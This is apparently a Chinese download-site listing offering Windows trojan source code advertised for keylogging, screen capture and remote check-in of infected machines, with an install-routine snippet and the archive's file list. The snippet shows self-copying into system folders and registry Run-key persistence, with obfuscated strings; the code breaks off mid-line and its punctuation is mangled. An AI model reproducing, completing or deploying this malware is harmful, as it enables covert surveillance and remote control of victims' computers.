资源简介

Trojan源码,可进行键盘记录,屏幕抓取,远程靶机上线提示

资源截图

代码片段和文件信息

#include 
#include 
#include “main.h“
#include “shared/include/maindef.h“
#include “shared/include/osversion.h“
#include “shared/include/ofuscstring.h“
#include “shared/include/loadDll.h“
#include “shared/include/structdll.h“
#include “shared/include/CHTTPClass.h“

typedef int (WINAPI *fnGETVERSION)(void);
typedef void (WINAPI *fnSTARTPAYLOAD)(PARAMETERS *pParam);
typedef void (WINAPI *fnSTOPPAYLOAD)(void);

/*  Declare Windows procedure  */
LRESULT CALLBACK WindowProcedure (HWND UINT WPARAM LPARAM);

bool install(API *pApi PARAMETERS *pParam) {
    char *svCommandLine; char *svCommandLine2;char svTargetName1[MAX_PATH];
    char svTargetName2[MAX_PATH];char svRegPath[MAX_PATH];char svTargetName3[MAX_PATH];
    char stCommandLine[MAX_PATH];
    char *svRunRegKey;char *svTargetName; bool bInstalled=false;
    DWORD dwLenght=512; DWORD lpType=REG_SZ; HKEY key;int i;
    
    _sleep(5000);


    sprintf(svTargetName3“%s%s“pParam->sTmpDirectorySTR_MAIN_PROCESSNAME);
    wsprintf(svTargetName1“%s\\%s“pParam->sSystemDirectorySTR_MAIN_PROCESSNAME);
    wsprintf(svTargetName2“%s\\Microsoft\\%s“pParam->sMyDocumentsSTR_MAIN_PROCESSNAME);

    strcpy(stCommandLineGetCommandLine());
    svCommandLine=stCommandLine;
    if (*svCommandLine==‘“‘) {
      svCommandLine++;
      *(svCommandLine+strlen(svCommandLine)-2)=0;                         
    }
    
    svCommandLine2=GetCommandLine();
    while (*svCommandLine2!=‘\0‘)
    {
          if (*svCommandLine2==‘ ‘ && *(svCommandLine-4)==‘.‘)
             *svCommandLine2=0;
          svCommandLine2++;
    }
    
    if(bIsWinNT) {
svRunRegKey=STR_INSTALL_KEY1;
} else {
svRunRegKey=STR_INSTALL_KEY2;
}

    if((GetFileAttributes(svTargetName1)!=0xFFFFFFFF) || (GetFileAttributes(svTargetName2)!=0xFFFFFFFF)){
        dwLenght=MAX_PATH;
        if (GetFileAttributes(svTargetName1)!=0xFFFFFFFF)
           strcpy(pParam->sInstalledRepsvTargetName1);
        else   
           strcpy(pParam->sInstalledRepsvTargetName2);
        
        
        if(pApi->pRegOpenKeyEx(HKEY_LOCAL_MACHINEsvRunRegKey0KEY_READ&key)==ERROR_SUCCESS)
            if (pApi->pRegQueryValueEx(keySTR_MAIN_KEYNAME0&lpType (BYTE *)svRegPath&dwLenght)==ERROR_SUCCESS) {
               strcpy(pParam->sInstalledKeysvRunRegKey);
               return true;
            }

        dwLenght=MAX_PATH;
        if (pApi->pRegOpenKey(HKEY_CURRENT_USERSTR_INSTALL_KEY1&key)==ERROR_SUCCESS)
          if (pApi->pRegQueryValueEx(keySTR_MAIN_KEYNAMENULLNULL(BYTE *)svRegPath&dwLenght)==ERROR_SUCCESS) {
                  strcpy(pParam->sInstalledKeysvRunRegKey);
                  return true;
          }
    }

    dwLenght=MAX_PATH;

    if((GetFileAttributes(svTargetName1)==0xFFFFFFFF) && (GetFileAttributes(svTargetName2)==0xFFFFFFFF))
    {
         if(CopyFile(svCommandLinesvTargetName1false))
            svTargetName=svTarg

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     目录           0  2014-01-09 16:43  trojan-master\
     目录           0  2014-01-09 16:43  trojan-master\2003\
     文件       86969  2014-01-09 16:43  trojan-master\2003\index.cst
     文件           4  2014-01-09 16:43  trojan-master\2003\version.php
     文件        1728  2014-01-09 16:43  trojan-master\Makefile.win
     文件         543  2014-01-09 16:43  trojan-master\README.md
     目录           0  2014-01-09 16:43  trojan-master\dll\
     文件        2113  2014-01-09 16:43  trojan-master\dll\Makefile.win
     目录           0  2014-01-09 16:43  trojan-master\dll\include\
     文件         830  2014-01-09 16:43  trojan-master\dll\include\CCmdExec.h
     文件        1227  2014-01-09 16:43  trojan-master\dll\include\ComManager.h
     文件         292  2014-01-09 16:43  trojan-master\dll\include\dll.h
     文件         831  2014-01-09 16:43  trojan-master\dll\include\function.h
     文件         631  2014-01-09 16:43  trojan-master\dll\include\trojr1_private.h
     目录           0  2014-01-09 16:43  trojan-master\dll\source\
     文件        4444  2014-01-09 16:43  trojan-master\dll\source\CCmdExec.cpp
     文件        6406  2014-01-09 16:43  trojan-master\dll\source\ComManager.cpp
     文件        3664  2014-01-09 16:43  trojan-master\dll\source\dllmain.cpp
     文件       12917  2014-01-09 16:43  trojan-master\dll\source\function.cpp
     文件        8463  2014-01-09 16:43  trojan-master\dll\source\main.cpp
     文件        1025  2014-01-09 16:43  trojan-master\dll\source\w32audio.dev
     文件        4377  2014-01-09 16:43  trojan-master\dll\w32audio.dev
     文件        1897  2014-01-09 16:43  trojan-master\dll\w32audio.layout
     文件        9071  2014-01-09 16:43  trojan-master\main.cpp
     文件         206  2014-01-09 16:43  trojan-master\main.h
     目录           0  2014-01-09 16:43  trojan-master\shared\
     目录           0  2014-01-09 16:43  trojan-master\shared\include\
     文件        2776  2014-01-09 16:43  trojan-master\shared\include\CHTTPClass.h
     文件         148  2014-01-09 16:43  trojan-master\shared\include\libc.h
     文件        5882  2014-01-09 16:43  trojan-master\shared\include\loadDll.h
     文件        1259  2014-01-09 16:43  trojan-master\shared\include\maindef.h
............此处省略11个文件信息

评论

共有 条评论